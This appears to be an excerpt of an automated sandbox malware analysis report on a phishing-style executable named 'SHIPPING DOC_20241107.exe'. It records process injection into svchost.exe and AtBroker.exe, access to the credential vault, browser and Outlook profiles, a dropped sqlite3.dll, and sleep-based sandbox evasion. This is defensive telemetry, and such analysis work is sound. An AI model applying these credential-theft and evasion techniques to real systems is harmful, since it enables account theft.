                Source: AtBroker.exe, 00000004.00000002.874811032.0000000061EA4000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                Source: AtBroker.exe, 00000004.00000002.874811032.0000000061EA4000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                Source: AtBroker.exe, 00000004.00000002.874811032.0000000061EA4000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                Source: AtBroker.exe, 00000004.00000002.874811032.0000000061EA4000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                Source: AtBroker.exe, 00000004.00000002.874811032.0000000061EA4000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                Source: AtBroker.exe, 00000004.00000002.874811032.0000000061EA4000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                Source: SHIPPING DOC_20241107.exeReversingLabs: Detection: 47%
                Source: unknownProcess created: C:\Users\user\Desktop\SHIPPING DOC_20241107.exe "C:\Users\user\Desktop\SHIPPING DOC_20241107.exe"
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SHIPPING DOC_20241107.exe"
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeProcess created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SHIPPING DOC_20241107.exe"Jump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeProcess created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: mozglue.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: wdscore.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: cryptui.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: riched32.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeSection loaded: version.dllJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Windows\SysWOW64\RichEd32.dllJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: SHIPPING DOC_20241107.exeStatic file information: File size 1536512 > 1048576
                Source: SHIPPING DOC_20241107.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: SHIPPING DOC_20241107.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: SHIPPING DOC_20241107.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: SHIPPING DOC_20241107.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: SHIPPING DOC_20241107.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: SHIPPING DOC_20241107.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: SHIPPING DOC_20241107.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: ATBroker.pdb2$ source: svchost.exe, 00000002.00000002.369002728.0000000000294000.00000004.00000020.00020000.00000000.sdmp, AhEyCWkdTLz.exe, 00000003.00000002.873933588.00000000004E4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: AhEyCWkdTLz.exe, 00000003.00000000.350491590.000000000136E000.00000002.00000001.01000000.00000004.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874244565.000000000136E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: ATBroker.pdb source: svchost.exe, 00000002.00000002.369002728.0000000000294000.00000004.00000020.00020000.00000000.sdmp, AhEyCWkdTLz.exe, 00000003.00000002.873933588.00000000004E4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SHIPPING DOC_20241107.exe, 00000000.00000003.347728935.0000000002940000.00000004.00001000.00020000.00000000.sdmp, SHIPPING DOC_20241107.exe, 00000000.00000003.347838149.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.369027051.0000000000880000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.348646748.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.348324365.0000000000450000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.369027051.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874145495.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874145495.0000000001F50000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000003.370964344.0000000001DC0000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000003.370658055.0000000001C60000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: AtBroker.exe, 00000004.00000002.874304385.00000000027FC000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000004.00000002.873985297.000000000044E000.00000004.00000020.00020000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000000.383610146.000000000339C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.436603581.0000000000E9C000.00000004.80000000.00040000.00000000.sdmp
                Source: SHIPPING DOC_20241107.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: SHIPPING DOC_20241107.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: SHIPPING DOC_20241107.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: SHIPPING DOC_20241107.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: SHIPPING DOC_20241107.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A2C104 LoadLibraryA,GetProcAddress,0_2_00A2C104
                Source: sqlite3.dll.4.drStatic PE information: section name: /4
                Source: sqlite3.dll.4.drStatic PE information: section name: /19
                Source: sqlite3.dll.4.drStatic PE information: section name: /31
                Source: sqlite3.dll.4.drStatic PE information: section name: /45
                Source: sqlite3.dll.4.drStatic PE information: section name: /57
                Source: sqlite3.dll.4.drStatic PE information: section name: /70
                Source: sqlite3.dll.4.drStatic PE information: section name: /81
                Source: sqlite3.dll.4.drStatic PE information: section name: /92
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009D8AC5 push ecx; ret 0_2_009D8AD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401AAD push 5BDF9A96h; iretd 2_2_00401ACA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402099 push esp; ret 2_2_0040209A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403390 push eax; ret 2_2_00403392
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404C75 push cs; iretd 2_2_00404C8B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040847B push cs; retf 2_2_0040847E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404D15 pushad ; ret 2_2_00404D16
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042D533 pushfd ; retf 2_2_0042D552
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404DBA push 6B6FB766h; ret 2_2_00404DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041277B push edi; iretd 2_2_0041278D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0089DFA1 push ecx; ret 2_2_0089DFB4
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeCode function: 3_2_05279579 push ecx; ret 3_2_052796BC
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeCode function: 3_2_0526FDA0 push cs; retf 3_2_0526FDA3
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeCode function: 3_2_0526C59A push cs; iretd 3_2_0526C5B0
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeCode function: 3_2_052864C6 push ebx; ret 3_2_052864CC
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeCode function: 3_2_0526C63A pushad ; ret 3_2_0526C63B
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeCode function: 3_2_05280E34 push eax; retf 3_2_05280EAA
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeCode function: 3_2_05279670 push ecx; ret 3_2_052796BC
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeCode function: 3_2_052796C1 push ecx; ret 3_2_052796BC
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeCode function: 3_2_0526C6DF push 6B6FB766h; ret 3_2_0526C6E4
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeCode function: 3_2_0527A0A0 push edi; iretd 3_2_0527A0B2
                Source: C:\Windows\SysWOW64\AtBroker.exeFile created: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009B4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_009B4A35
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A353DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00A353DF
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_009D3307 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009D3307
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeAPI/Special instruction interceptor: Address: EA2C2C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008E0101 rdtsc 2_2_008E0101
                Source: C:\Windows\SysWOW64\AtBroker.exeWindow / User API: threadDelayed 9810Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-101021
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeAPI coverage: 4.1 %
                Source: C:\Windows\SysWOW64\AtBroker.exe TID: 3624Thread sleep count: 149 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exe TID: 3624Thread sleep time: -298000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exe TID: 3712Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exe TID: 3624Thread sleep count: 9810 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exe TID: 3624Thread sleep time: -19620000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe TID: 3656Thread sleep time: -50000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe TID: 3656Thread sleep count: 43 > 30Jump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe TID: 3656Thread sleep time: -64500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe TID: 3656Thread sleep count: 42 > 30Jump to behavior
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe TID: 3656Thread sleep time: -42000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\AtBroker.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\AtBroker.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A1449B GetFileAttributesW,FindFirstFileW,FindClose,0_2_00A1449B
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A1C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00A1C7E8
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A1C75D FindFirstFileW,FindClose,0_2_00A1C75D
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A1F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00A1F021
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A1F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00A1F17E
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A1F47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00A1F47F
